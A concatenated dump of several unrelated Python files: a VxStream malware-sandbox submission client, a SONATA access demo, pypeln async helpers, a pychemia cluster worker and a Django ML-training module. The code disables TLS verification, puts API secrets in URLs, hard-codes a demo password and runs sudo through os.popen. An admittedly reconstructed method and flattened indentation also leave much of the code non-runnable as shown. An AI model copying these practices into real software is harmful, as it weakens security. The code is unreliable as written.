'environmentId': environment_id }
hasher = hashlib.sha256()
with open(file_path, 'rb') as fp:
            while True:
                # read in chunks; use a separate name so the POST payload dict above is not clobbered
                chunk = fp.read(io.DEFAULT_BUFFER_SIZE)
                if chunk == b'':
                    break
                hasher.update(chunk)
sha256 = hasher.hexdigest()
url = '{}/api/reanalyze/{}'.format(self.url, sha256)
result = requests.post(url, data=data, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
logging.debug("got response_code {} for {}".format(result.status_code, url))
if result.status_code != 200:
logging.error("error code {} ({}) returned for {}".format(result.status_code, result.reason, sha256))
return None
status = self.get_status(sha256, environment_id)
logging.debug("got status {} for {}".format(status, sha256))
result = VxStreamSubmission(file_path, sha256, environment_id)
result.status = status
return result
def submit(self, file_path, environment_id):
# make sure we haven't already submitted this, eh?
hasher = hashlib.sha256()
with open(file_path, 'rb') as fp:
while True:
data = fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
hasher.update(data)
sha256 = hasher.hexdigest()
status = self.get_status(sha256, environment_id)
if status != VXSTREAM_STATUS_UNKNOWN:
logging.info("{} already uploaded".format(file_path))
result = VxStreamSubmission(file_path, sha256, environment_id)
result.status = status
return result
with open(file_path, 'rb') as fp_binary:
# submit the file to vxstream
files = { 'file': fp_binary }
data = {
'apikey': self.api_key,
'secret': self.secret,
'environmentId': environment_id }
submit_url = '{}/api/submit'.format(self.url)
logging.info("submitting {} to {} environment {}".format(file_path, submit_url, environment_id))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = requests.post(submit_url, data=data, files=files, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("error code {} ({}) returned for {}".format(result.status_code, result.reason, file_path))
return None
return VxStreamSubmission(file_path, sha256, environment_id)
def wait(self, sha256, environment_id):
current_status = None
while not self.shutdown:
status = self.get_status(sha256, environment_id)
if current_status != status:
logging.info("{} status changed to {}".format(sha256, status))
current_status = status
if status == VXSTREAM_STATUS_ERROR:
logging.info("detected error state for {}".format(sha256))
return VXSTREAM_STATUS_ERROR
if status == VXSTREAM_STATUS_SUCCESS:
logging.info("{} completed".format(sha256))
return VXSTREAM_STATUS_SUCCESS
time.sleep(self.query_frequency)
def download(self, sha256, environment_id, _type, path):
download_url = '{}/api/result/{}&type={}'.format(
self.url,
self.get_sample_url(sha256, environment_id),
_type)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
logging.info("downloading {} for {} env {}".format(_type, sha256, environment_id))
result = requests.get(download_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream: {}".format(result.status_code, result.reason))
return None
with open(path, 'wb') as fp:
for block in result.iter_content(io.DEFAULT_BUFFER_SIZE):
fp.write(block)
return path
def download_dropped_files(self, sha256, environment_id, target_dir):
"""Downloads the dropped files for this sample into target_dir. Returns the list of files extracted."""
download_url = '{}/api/sample-dropped-files/{}?environmentId={}&apikey={}&secret={}'.format(
self.url,
sha256,
environment_id,
self.api_key,
self.secret)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
logging.info("downloading dropped files from {}".format(download_url))
result = requests.get(download_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream for {}: {}".format(result.status_code, download_url, result.reason))
return None
# put what we download into a temporary directory
temp_dir = tempfile.mkdtemp()
try:
# all dropped files come in a zip file
compressed_path = os.path.join(temp_dir, 'download.zip')
# write zip file to disk
with open(compressed_path, 'wb') as fp:
for block in result.iter_content(io.DEFAULT_BUFFER_SIZE):
fp.write(block)
# unzip without paths
p = Popen(['7z', 'e', '-y', '-o{}'.format(target_dir), compressed_path], stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
try:
os.remove(compressed_path)
except Exception as e:
logging.error("unable to delete {}: {}".format(compressed_path, e))
# list gz files in drop_path
file_list = [os.path.join(target_dir, f) for f in os.listdir(target_dir) if f.endswith('.gz')]
result = []
for compressed_path in file_list:
# there are some other files in here sometimes that we'll ignore
# we just want the dropped file
if '.DROPPED.' not in compressed_path:
continue
DROPPED_FILE_REGEX = re.compile(r'^(.+?)\.[0-9]+\.DROPPED\.gz')
# the file paths look like this
# dropped/78QC7UOHAWCI47906LWH.temp.4212842214.DROPPED.gZ
m = DROPPED_FILE_REGEX.match(os.path.basename(compressed_path))
if not m:
logging.error("could not extract file name from {}".format(compressed_path))
continue
target_path = os.path.join(target_dir, m.group(1))
result.append(target_path)
with gzip.open(compressed_path) as fp:
logging.debug("decompressing {}".format(compressed_path))
with open(target_path, 'wb') as dest_fp:
while True:
data = fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
dest_fp.write(data)
os.remove(compressed_path)
return result
finally:
try:
if temp_dir:
shutil.rmtree(temp_dir)
except Exception as e:
logging.error("unable to delete temporary directory {}: {}".format(temp_dir, e))
def download_memory_dump(self, sha256, environment_id, dest_dir):
"""Downloads the given memory dump into the given directory. Returns a tuple of a list of files extracted from what was downloaded, and the path to the combined memory dump."""
dest_path = os.path.join(dest_dir, 'memory.zip')
if self.download(sha256, environment_id, VXSTREAM_DOWNLOAD_MEMORY, dest_path) is None:
return None
with open(dest_path, 'rb') as fp:
blob = fp.read(1024)
if b'No dump files available' in blob:
logging.debug("memory dump not available for {} env {}".format(sha256, environment_id))
return None
logging.debug("extracting memory dump {} into {}".format(dest_path, dest_dir))
p = Popen(['7z', 'x', '-y', '-o{}'.format(dest_dir), dest_path], stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
file_list = []
for file_path in [os.path.join(dest_dir, f) for f in os.listdir(dest_dir) if f != "memory.zip"]:
file_list.append(file_path)
# concatenate all these files into one file
dest_path = os.path.join(dest_dir, 'memory.combined.mdmp')
for file_path in file_list:
logging.debug("concatenating {}".format(file_path))
with open(file_path, 'rb') as input_fp:
with open(dest_path, 'ab') as output_fp:
while True:
data = input_fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
output_fp.write(data)
return file_list, dest_path
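    def download_results(self, submission, output_dir):
        """Downloads all available results for a completed submission into output_dir.

        NOTE: this method is referenced by the __main__ block below but was missing
        from this file. The implementation here is a minimal reconstruction built
        from the helpers above; the per-sample directory layout
        (output_dir/<sha256>/ with dropped/ and memory/ subdirectories) is an
        assumption, not confirmed by the original source."""
        result = VxStreamDownloadResults(submission)
        sample_dir = os.path.join(output_dir, submission.sha256)
        dropped_dir = os.path.join(sample_dir, 'dropped')
        memory_dir = os.path.join(sample_dir, 'memory')
        for d in (sample_dir, dropped_dir, memory_dir):
            if not os.path.isdir(d):
                os.makedirs(d)
        # reports and network traffic go into the per-sample directory
        result.json_path = self.download(submission.sha256, submission.environment_id,
                                         VXSTREAM_DOWNLOAD_JSON, os.path.join(sample_dir, 'report.json'))
        result.xml_path = self.download(submission.sha256, submission.environment_id,
                                        VXSTREAM_DOWNLOAD_XML, os.path.join(sample_dir, 'report.xml'))
        result.html_path = self.download(submission.sha256, submission.environment_id,
                                         VXSTREAM_DOWNLOAD_HTML, os.path.join(sample_dir, 'report.html'))
        result.pcap_path = self.download(submission.sha256, submission.environment_id,
                                         VXSTREAM_DOWNLOAD_PCAP, os.path.join(sample_dir, 'traffic.pcap'))
        # dropped files and memory dumps go into their own subdirectories
        dropped = self.download_dropped_files(submission.sha256, submission.environment_id, dropped_dir)
        if dropped is not None:
            result.dropped_files = dropped
        memory = self.download_memory_dump(submission.sha256, submission.environment_id, memory_dir)
        if memory is not None:
            result.memory_dump_files, result.combined_memory_dump_path = memory
        return result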
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description="Submit one or more files to vxstream for processing.")
parser.add_argument('files', nargs="*", help="Zero or more files to submit. Also see --from-stdin")
parser.add_argument('--from-stdin', required=False, default=False, action='store_true', dest='from_stdin',
help="Read the files to scan from standard input.")
parser.add_argument('--sha256', required=False, default=None, dest='sha256',
help="Download the results of the given sha256 hash.")
parser.add_argument('--environment_id', required=False, default='3', dest='environment_id',
help="Select the environment ID to use.")
parser.add_argument('-u', '--url', required=False, default='https://vxstream.local', dest='url',
help="The URI to submit the files to.")
parser.add_argument('-d', '--dir', required=False, default='vxstream.out', dest='output_dir',
help="The output directory to place the downloaded results into.")
parser.add_argument('-l', '--log-level', required=False, default='WARNING', dest='log_level',
help="The logging level to use for log events.")
#parser.add_argument('--decompress', required=False, default=False, action='store_true', dest='decompress',
#help="Automatically decompress and extract dropped files and memory dumps.")
#parser.add_argument('--download-html', required=False, default=False, action='store_true', dest='download_html',
#help="Also download the HTML report.")
#parser.add_argument('--download-xml', required=False, default=False, action='store_true', dest='download_xml',
#help="Also download the XML report.")
#parser.add_argument('--download-dropped-files', required=False, default=False, action='store_true', dest='download_dropped_files',
#help="Also download the dropped files.")
parser.add_argument('-e', '--email', required=False, action='append', default=[], dest='email_addresses',
help="Send an email when completed. Can specify more than one of these options.")
parser.add_argument('--smtp-server', required=False, default='ashsmtp.asco.ashland.com', dest='smtp_server',
help="Specify an alternate SMTP server to use.")
parser.add_argument('--api-key', required=False, default='', dest='api_key')
parser.add_argument('--secret', required=False, default='', dest='secret')
parser.add_argument('--delay', required=False, default=1, type=int, dest='delay',
help="The number of seconds to delay in between each attempt to query status of submitted files.")
parser.add_argument('--split-memory-dump', required=False, default=False, action='store_true', dest='split_memory',
help="Download the memory dump as separate files instead of an individual file.")
args = parser.parse_args()
logging.basicConfig(level=args.log_level, format='[%(asctime)s] [%(levelname)s] - %(message)s')
logging.getLogger("requests").setLevel(logging.WARNING)
if not os.path.isdir(args.output_dir):
try:
os.makedirs(args.output_dir)
except Exception as e:
logging.error("unable to create output directory {}: {}".format(args.output_dir, str(e)))
sys.exit(1)
server = VxStreamServer(args.url, args.api_key, args.secret)
submissions = [] # list of VxStreamSubmission objects we will be tracking
if args.sha256 is not None:
submissions.append(VxStreamSubmission('(unknown)', args.sha256, args.environment_id))
else:
# are we reading list of files from command line or stdin?
file_list = args.files
if args.from_stdin:
file_list = sys.stdin
for f in file_list:
# files from stdin will have trailing return
if args.from_stdin:
f = f.strip()
submission = server.submit(f, args.environment_id)
if submission is None:
continue
submissions.append(submission)
if len(submissions) == 0:
logging.error("no files were submitted")
sys.exit(1)
def state_change_handler(server, submission):
if submission.status == VXSTREAM_STATUS_SUCCESS:
result = server.download_results(submission, args.output_dir)
for file_path in [
result.json_path,
result.pcap_path,
result.xml_path,
result.html_path ]:
if file_path is not None:
print(file_path)
for file_path in result.dropped_files:
print(file_path)
if args.split_memory:
for file_path in result.memory_dump_files:
print(file_path)
else:
if result.combined_memory_dump_path is not None:
print(result.combined_memory_dump_path)
symlink_path = os.path.join(args.output_dir, os.path.basename(submission.file_name))
if not os.path.lexists(symlink_path):
try:
os.symlink(os.path.basename(os.path.dirname(result.json_path)), symlink_path)
except Exception as e:
logging.error("unable to create symlink {}: {}".format(symlink_path, str(e)))
manager = VxStreamSubmissionManager(server, submissions, delay=args.delay)
manager.add_callback(state_change_handler)
manager.start()
manager.wait()
|
demo.py
|
# Copyright (c) 2015 SONATA-NFV, UBIWHERE, i2CAT,
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, UBIWHERE, i2CAT
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
"""
PORTO F2F Meeting short demo on features:
- Access token
- Push package function
"""
import os
import sys; print('Python %s on %s' % (sys.version, sys.platform))
import time
import requests
from multiprocessing import Process
from son.access.utils.mock import main as mocked
# dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
# sys.path.extend([str(dir)])
class mcolors:
OKGREEN = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def disable(self):
self.OKGREEN = ''
self.FAIL = ''
self.ENDC = ''
def main():
print("\n")
print("=== ", mcolors.OKGREEN + "SON-ACCESS AUTHENTICATION ", mcolors.ENDC + "===\n")
print(mcolors.OKGREEN + "Logging in with USERNAME: tester\n", mcolors.ENDC)
url = "http://0.0.0.0:5001/login"
# Construct the POST request
form_data = {
'username': 'tester',
'password': '1234'
}
response = requests.post(url, data=form_data, verify=False)
print("Access Token received: ", mcolors.OKGREEN + response.text + "\n", mcolors.ENDC)
time.sleep(3)
print("=== ", mcolors.OKGREEN + "SON-ACCESS PUSH SON-PACKAGE ", mcolors.ENDC + "===\n")
mode = "push"
url = "http://sp.int3.sonata-nfv.eu:32001"
pkg = "samples/sonata-demo.son"
# Push son-package to the Service Platform
command = "sudo python %s.py -U %s" % (mode, pkg)
print("Calling: ", mcolors.OKGREEN + command + "\n", mcolors.ENDC)
result = os.popen(command).read()
print("Response: ", mcolors.OKGREEN + result + "\n", mcolors.ENDC)
time.sleep(3)
# Get son-packages list from the Service Platform to check submitted son-package
mode = "pull"
command = "sudo python %s.py --list_packages" % mode
print("Calling: ", mcolors.OKGREEN + command + "\n", mcolors.ENDC)
result = os.popen(command).read()
print("Response: ", mcolors.OKGREEN + result + "\n", mcolors.ENDC)
processes = []
# Run fake user management module
print(mcolors.FAIL + "Starting 'fake' User Management module", mcolors.ENDC)
p = Process(target=mocked,)
time.sleep(0.5)
p.start()
processes.append(p)
time.sleep(3)
# Run demo main process
p = Process(target=main,)
p.start()
processes.append(p)
time.sleep(1)
try:
for process in processes:
process.join()
except KeyboardInterrupt:
print("Keyboard interrupt in main")
except Exception as e:
print("ERROR: ", e)
finally:
print("Cleaning up Main")
|
utils.py
|
import asyncio
from collections import namedtuple
from queue import Empty, Full, Queue
from threading import Lock, Thread
from pypeln import utils as pypeln_utils
import time
LOOP = asyncio.new_event_loop()
def run_on_loop(f_coro):
if not LOOP.is_running():
def run():
LOOP.run_forever()
thread = Thread(target=run)
thread.daemon = True
thread.start()
LOOP.call_soon_threadsafe(lambda: LOOP.create_task(f_coro()))
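# Example (illustrative sketch only): schedule a coroutine function on the shared
# background loop; `warm_up` is a hypothetical coroutine defined just for this example.
#
#   async def warm_up():
#       await asyncio.sleep(0.1)
#
#   run_on_loop(warm_up)  # returns immediately; warm_up runs on LOOP's daemon thread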
def get_namespace():
return pypeln_utils.Namespace()
class TaskPool(object):
def __init__(self, workers):
self.semaphore = asyncio.Semaphore(workers)
self.tasks = set()
self.closed = False
async def put(self, coro):
if self.closed:
            raise RuntimeError("Trying to put items into a closed TaskPool")
await self.semaphore.acquire()
task = asyncio.create_task(coro)
self.tasks.add(task)
task.add_done_callback(self.on_task_done)
def on_task_done(self, task):
self.tasks.remove(task)
self.semaphore.release()
async def join(self):
await asyncio.gather(*self.tasks)
self.closed = True
async def __aenter__(self):
return self
def __aexit__(self, exc_type, exc, tb):
return self.join()
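# Example (illustrative sketch only): bound the number of in-flight tasks with
# TaskPool; `fetch` and the worker count are placeholders for this example.
#
#   async def fetch(i):
#       await asyncio.sleep(0.01)
#
#   async def main():
#       async with TaskPool(workers=10) as pool:
#           for i in range(100):
#               await pool.put(fetch(i))  # blocks once 10 tasks are running
#
#   run_on_loop(main)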
class IterableQueue(asyncio.Queue):
def __init__(self, maxsize, total_done, pipeline_namespace, loop, **kwargs):
super().__init__(maxsize=maxsize, loop=loop, **kwargs)
self.remaining = total_done
self.pipeline_namespace = pipeline_namespace
async def __aiter__(self):
while not self.is_done():
x = await self.get()
if self.pipeline_namespace.error:
return
if not pypeln_utils.is_continue(x):
yield x
def __iter__(self):
while not self.is_done():
if self.pipeline_namespace.error:
return
if self.empty():
time.sleep(pypeln_utils.TIMEOUT)
else:
x = self.get_nowait()
if not pypeln_utils.is_continue(x):
yield x
async def get(self):
x = await super().get()
if pypeln_utils.is_done(x):
self.remaining -= 1
return pypeln_utils.CONTINUE
return x
def get_nowait(self):
x = super().get_nowait()
if pypeln_utils.is_done(x):
self.remaining -= 1
return pypeln_utils.CONTINUE
return x
def is_done(self):
return self.remaining == 0 # and self.empty()
async def done(self):
await self.put(pypeln_utils.DONE)
def done_nowait(self):
self.put_nowait(pypeln_utils.DONE)
class MultiQueue(list):
async def put(self, x):
for queue in self:
await queue.put(x)
async def done(self):
for queue in self:
await queue.put(pypeln_utils.DONE)
async def __aenter__(self):
return self
def __aexit__(self, exc_type, exc, tb):
return self.done()
class StageStatus(object):
def __init__(self):
pass
@property
def done(self):
return True
@property
def active_workers(self):
return 0
def __str__(self):
return "StageStatus(done = {done}, active_workers = {active_workers})".format(
done=self.done, active_workers=self.active_workers,
)
WorkerInfo = namedtuple("WorkerInfo", ["index"])
class StageReuseError(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
|
cluster_fireball.py
|
import os
import time
from multiprocessing import Pool, Process
import pychemia
from pychemia.utils.serializer import generic_serializer
__author__ = 'Guillermo Avendano-Franco'
def cluster_fb_worker(db_settings):
while True:
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is not None:
population.pcdb.lock(entry['_id'])
structure = population.pcdb.get_structure(entry['_id'])
fb = pychemia.code.fireball.FireBall(fdata_path='../Fdata')
fb.initialize(structure, workdir=str(entry['_id']))
fb.cluster_relaxation()
fb.set_inputs()
sp = fb.run()
sp.wait()
so = pychemia.code.fireball.read_fireball_stdout(fb.workdir + os.sep + 'fireball.log')
forces = generic_serializer(so['forces'][-1])
energy = so['energy'][-1]['ETOT']
properties = {'forces': forces, 'energy': energy}
structure = pychemia.code.fireball.read_geometry_bas(fb.workdir + os.sep + 'answer.bas')
population.pcdb.update(entry['_id'], structure=structure, properties=properties)
population.pcdb.unlock(entry['_id'])
else:
break
def cluster_fb_evaluator(db_settings, nparal):
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
    print('Starting evaluator for ', population.name)
while True:
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is None:
time.sleep(2)
create_pool = False
else:
create_pool = True
if create_pool:
pool = Pool(processes=nparal)
pool.map(cluster_fb_worker, nparal * [db_settings])
pool.close()
pool.join()
def cluster_fb_launcher(db_settings, nparal):
p = Process(target=cluster_fb_evaluator, args=(db_settings, nparal))
p.start()
return p
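# Example (illustrative sketch only): launch the evaluator as a background process.
# The db_settings values below are placeholders, not taken from the original source.
#
#   db_settings = {'name': 'lj_clusters', 'host': 'localhost', 'port': 27017}
#   proc = cluster_fb_launcher(db_settings, nparal=4)
#   proc.join()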
|
training.py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
from django.views.decorators.csrf import csrf_exempt
# from rest_framework.decorators import api_view,renderer_classes,
from django.http import JsonResponse
from django.views.decorators.http import require_POST
from rest_framework.decorators import api_view,schema
import pandas as pd
import numpy as np
from sklearn.externals import joblib
from django.utils.encoding import smart_str
import os,ast, signal,operator,requests, json,time,datetime
from string import ascii_uppercase
from random import choice
from multiprocessing import Process, Lock
global DATA_MEMORY_OBJS_SKLEARN
import ast,pathlib
# RUNNING_TASK_MEMORY=[]
from utility.utilityClass import RUNNING_TASK_MEMORY
DATA_MEMORY_OBJS_SKLEARN={}
from trainModel import kerasUtilities,mergeTrainingNN,autoMLutilities,trainAutoMLV2,trainMaskRCNN
kerasUtilities = kerasUtilities.KerasUtilities()
autoMLutilities = autoMLutilities.AutoMLUtilities()
# from SwaggerSchema.schemas import (autoMLsendDataSwagger,
# autoMLtrainModelSwagger,
# statusOfModelSwagger,
# trainNeuralNetworkModelsSwagger,
# )
settingFilePath='settingFiles/'
pathOfStatus='resultStatus/'
SavedModels='SavedModels/'
logFolder='logs/'
runPorts=range(6006,6026)
runPortsUsage='inactive'
tensorboardPort=pd.DataFrame(data={'runPorts':runPorts,'runPortsUsage':runPortsUsage,'usedForLogs':None})
tensorboardPort.to_csv(settingFilePath+'tensorboardPort.txt',index=False)
runPorts=range(8888,8891)
runPortsUsage='inactive'
jupyterNotebook=pd.DataFrame(data={'runPorts':runPorts,'runPortsUsage':runPortsUsage,'usedForLogs':None})
jupyterNotebook.to_csv(settingFilePath+'jupyterNotebook.txt',index=False)
class Training:
# @csrf_exempt
# @api_view(['POST'])
# @schema(trainNeuralNetworkModelsSwagger)
# @api_view()
def trainNeuralNetworkModels(requests):
def getValueFromReq(keyVal,bodyVal):
# print ('requests',requests.body)
try:
# print (requests.POST.get(keyVal))
return bodyVal[keyVal]
except:
return ''
# pmmlFile=requests.POST.get('filePath')
bodyVal=json.loads(requests.body)
# print ('came heer 2nd',bodyVal)
pmmlFile=getValueFromReq('filePath',bodyVal)
tensorboardUrl=getValueFromReq('tensorboardUrl',bodyVal)
tensorboardLogFolder=getValueFromReq('tensorboardLogFolder',bodyVal)
hyperParaUser={}
hyperParaUser['batchSize']=getValueFromReq('batchSize',bodyVal)
hyperParaUser['optimizer']=getValueFromReq('optimizer',bodyVal)
hyperParaUser['loss']=getValueFromReq('loss',bodyVal)
hyperParaUser['metrics']=getValueFromReq('metrics',bodyVal)
hyperParaUser['epoch']=getValueFromReq('epoch',bodyVal)
hyperParaUser['problemType']=getValueFromReq('problemType',bodyVal)
hyperParaUser['testSize']=getValueFromReq('testSize',bodyVal)
hyperParaUser['learningRate']=getValueFromReq('learningRate',bodyVal)
# hyperParaUser['']=getValueFromReq('',requests)
# hyperParaUser['']=getValueFromReq('',requests)
# print ('>>>>>>>>PPPPPPPPPPPPPPPP ',pmmlFile,tensorboardUrl,tensorboardLogFolder,hyperParaUser)
idforData=int(time.time())
idforData=str(idforData)+'_NN'
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
statusfileLocation=saveStatus+'status.txt'
data_details={}
data_details['tensorboardUrl']=tensorboardUrl
data_details['idforData']=idforData
data_details['status']='In Progress'
fObjScrpt=pathlib.Path(pmmlFile)
data_details['taskName']=fObjScrpt.name
data_details['createdOn']= str(datetime.datetime.now())
data_details['type']= 'NNProject'
data_details['problem_type']= hyperParaUser['problemType']
data_details["newPMMLFileName"]=pmmlFile
nntrainer = mergeTrainingNN.NeuralNetworkModelTrainer()
pID = nntrainer.train(idforData,pmmlFile,tensorboardLogFolder,hyperParaUser,pmmlFile)
data_details['pID']=str(pID)
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
# statusfileLocation=saveStatus+'status.txt'
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
if pID == -1:
# data_details['status']='In Progress'
kerasUtilities.updateStatusOfTraining(statusfileLocation,'Training Failed')
else:
pass
runTemp=[i['idforData'] for i in RUNNING_TASK_MEMORY]
if data_details['idforData'] not in runTemp:
# print ('PPPPPPPPPPPPPPPPPPPP Saved to runningTask')
tempRunMemory=data_details
RUNNING_TASK_MEMORY.append(tempRunMemory)
else:
pass
print ('P'*200)
print ('data_details',data_details)
return JsonResponse(data_details,status=202)
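    # Example (illustrative only): the JSON body expected by trainNeuralNetworkModels,
    # assembled from the getValueFromReq() calls above. All values are placeholders.
    #
    #   {
    #       "filePath": "path/to/model.pmml",
    #       "tensorboardUrl": "",
    #       "tensorboardLogFolder": "logs/tb",
    #       "batchSize": 32,
    #       "optimizer": "adam",
    #       "loss": "categorical_crossentropy",
    #       "metrics": ["accuracy"],
    #       "epoch": 10,
    #       "problemType": "classification",
    #       "testSize": 0.2,
    #       "learningRate": 0.001
    #   }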
# @csrf_exempt
# @api_view(['POST'])
# @schema(autoMLsendDataSwagger)
def autoMLdataprocess(pathOffile):
def dataReaderForJson(pathOffile):
ww=open(pathOffile,'r')
jD=json.loads(ww.read())
sampeData=pd.DataFrame(jD['values']).transpose()
sampeData.columns=[i['name'] for i in jD['series']]
for j in sampeData.columns:
sampeData[j]=sampeData[j].apply(lambda x: (x['min']+x['max'])/2)
return sampeData
global DATA_MEMORY_OBJS_SKLEARN
# pathOffile=requests.GET['filePath']
if '.json' in pathOffile:
data=dataReaderForJson(pathOffile)
else:
data=pd.read_csv(pathOffile,encoding='latin-1')
idforData=int(time.time())
idforData=str(idforData)+'_autoML'
DATA_MEMORY_OBJS_SKLEARN[idforData]=data
# print(data.shape)
data_details=autoMLutilities.dataDescription(data)
data_details['idforData']=idforData
return JsonResponse(data_details)
# @csrf_exempt
# @api_view(['POST'])
# @schema(autoMLtrainModelSwagger)
def autoMLtrainModel(userInput):
global DATA_MEMORY_OBJS_SKLEARN
# userInput=requests.body
# userInput=json.loads(userInput)
paramToTrainModel=userInput['data']
idforData=userInput['idforData']
data=DATA_MEMORY_OBJS_SKLEARN[idforData]
dataPath=userInput['filePath']
targetVar=userInput['target_variable']
problem_type=userInput['problem_type']
# algorithms=userInput['parameters']['algorithm']
try:
algorithms=userInput['parameters']['algorithm']
if algorithms[0]=='All':
raise Exception("")
except:
if problem_type =='Regression':
algorithms=['ExtraTreeRegressor','GradientBoostingRegressor','DecisionTreeRegressor','LinearSVR',\
'RandomForestRegressor','XGBRegressor','KNeighborsRegressor','LinearRegression','LGBMRegressor']
else:
algorithms=['DecisionTreeClassifier','ExtraTreesClassifier','RandomForestClassifier','GradientBoostingClassifier',\
'KNeighborsClassifier','LinearSVC','LogisticRegression','XGBClassifier','LGBMClassifier']
try:
newPMMLFileName = userInput['newPMMLFileName']
if not newPMMLFileName.endswith('.pmml'):
newPMMLFileName = newPMMLFileName+'.pmml'
except:
newPMMLFileName=idforData+'.pmml'
projectName=idforData
projectPath=logFolder+projectName
dataFolder=projectPath+'/dataFolder/'
tpotFolder=projectPath+'/tpotFolder/'
try:
os.makedirs(projectPath)
os.mkdir(dataFolder)
os.mkdir(tpotFolder)
except Exception as e:
print('>>>>>>>>>>>>>>>>', str(e))
autoMLLock=Lock()
trainer = trainAutoMLV2.AutoMLTrainer(algorithms=algorithms, problemType=problem_type)
train_prc = Process(target=trainer.trainModel,args=(data,logFolder, newPMMLFileName, autoMLLock, userInput))
# train_prc = Process(target=trainAutoMLV2.mainTrainAutoML,args=(data,paramToTrainModel,targetVar,idforData,problem_type,logFolder,newPMMLFileName))
train_prc.start()
pID=train_prc.ident
statusFile=dataFolder+'status'+'.txt'
# sFileText=sFile.read()
# data_details=json.loads(sFileText)
data_details={}
data_details['pID']=str(pID)
data_details['status']='In Progress'
data_details['newPMMLFileName']=newPMMLFileName
data_details['targetVar']=targetVar
data_details['problem_type']=problem_type
data_details['idforData']=idforData
data_details['shape']=data.shape
import pathlib
fVar=pathlib.Path(dataPath)
data_details['taskName']=fVar.name.replace(fVar.suffix,'')#newPMMLFileName.split('/')[-1]
autoMLLock.acquire()
with open(statusFile,'w') as filetosave:
json.dump(data_details, filetosave)
autoMLLock.release()
tempRunMemory={'idforData': projectName,
'status': 'In Progress',
'type': 'AutoMLProject',
'pid': pID,
'createdOn': str(datetime.datetime.now()),
'newPMMLFileName': newPMMLFileName.split('/')[-1]
}
tempRunMemory['taskName']=data_details['taskName']
# print ('>>>>>>>>>>>>>>>>>>>>AutoML',tempRunMemory)
RUNNING_TASK_MEMORY.append(tempRunMemory)
# print ('RUNNING_TASK_MEMORY >>>>>>>>>',RUNNING_TASK_MEMORY)
return JsonResponse(data_details,status=202)
def autoAnomalyModel(userInput):
global DATA_MEMORY_OBJS_SKLEARN
# userInput=requests.body
# userInput=json.loads(userInput)
paramToTrainModel=userInput['data']
idforData=userInput['idforData']
data=DATA_MEMORY_OBJS_SKLEARN[idforData]
dataPath=userInput['filePath']
try:
targetVar=userInput['target_variable']
except:
targetVar=None
try:
problem_type=userInput['problem_type']
except:
problem_type=None
algorithms=userInput['parameters']['algorithm']
try:
newPMMLFileName = userInput['newPMMLFileName']
if not newPMMLFileName.endswith('.pmml'):
newPMMLFileName = newPMMLFileName+'.pmml'
except:
newPMMLFileName=idforData+'.pmml'
projectName=idforData
projectPath=logFolder+projectName
dataFolder=projectPath+'/dataFolder/'
try:
os.makedirs(projectPath)
os.mkdir(dataFolder)
except Exception as e:
print('>>>>>>>>>>>>>>>>', str(e))
autoMLLock=Lock()
trainer = trainAutoMLV2.AnomalyTrainer(algorithms=algorithms, problemType=problem_type)
train_prc = Process(target=trainer.trainAnomalyModel,args=(data,logFolder, newPMMLFileName, autoMLLock, userInput))
# train_prc = Process(target=trainAutoMLV2.mainTrainAutoML,args=(data,paramToTrainModel,targetVar,idforData,problem_type,logFolder,newPMMLFileName))
train_prc.start()
pID=train_prc.ident
statusFile=dataFolder+'status'+'.txt'
# sFileText=sFile.read()
# data_details=json.loads(sFileText)
data_details={}
data_details['pID']=str(pID)
data_details['status']='In Progress'
data_details['newPMMLFileName']=newPMMLFileName
data_details['targetVar']=targetVar
data_details['problem_type']=problem_type
data_details['idforData']=idforData
data_details['shape']=data.shape
import pathlib
fVar=pathlib.Path(dataPath)
data_details['taskName']=fVar.name.replace(fVar.suffix,'')#newPMMLFileName.split('/')[-1]
autoMLLock.acquire()
with open(statusFile,'w') as filetosave:
json.dump(data_details, filetosave)
autoMLLock.release()
tempRunMemory={'idforData': projectName,
'status': 'In Progress',
'type': 'AutoMLProject',
'pid': pID,
